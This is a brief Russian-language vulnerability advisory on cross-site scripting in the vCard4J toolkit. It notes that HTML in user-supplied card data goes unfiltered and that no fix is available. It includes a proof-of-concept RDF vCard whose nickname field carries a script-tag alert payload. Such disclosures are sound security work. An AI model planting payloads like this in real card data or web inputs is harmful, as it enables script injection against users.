Межсайтовый скриптинг в vCard4J Toolkit

Описание: Уязвимость в проверке правильности входных данных обнаружена в vCard4J Java-based vCard toolkit. Удаленный пользователь может выполнить XSS нападение.

В конфигурации по умолчанию, программа не фильтрует HTML код в данных, представленных пользователем при создании card файлов.

Пример/Эксплоит:

  <vCard:GROUP>
     <rdf:bag>
       <rdf:li rdf:parseType="Resource">
         <vCard:NICKNAME> Corky Porky </vCard:NICKNAME>
         <vCard:NOTE> Only used by close friends porky pork pork </vCard:NOTE>
       </rdf:li>        <rdf:li rdf:parseType="Resource">
         <vCard:NICKNAME> Princess Corky the pork snorter <script>alert('cork+kork+your+sniffy+sniff+')</script></vCard:NICKNAME>
         <vCard:NOTE> Only used by my egg pups in the loungeroom and also justin winamp goblin</vCard:NOTE>
       </rdf:li>
     </rdf:bag>
   </vCard:GROUP>

URL производителя:http://vcard4j.sourceforge.net

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.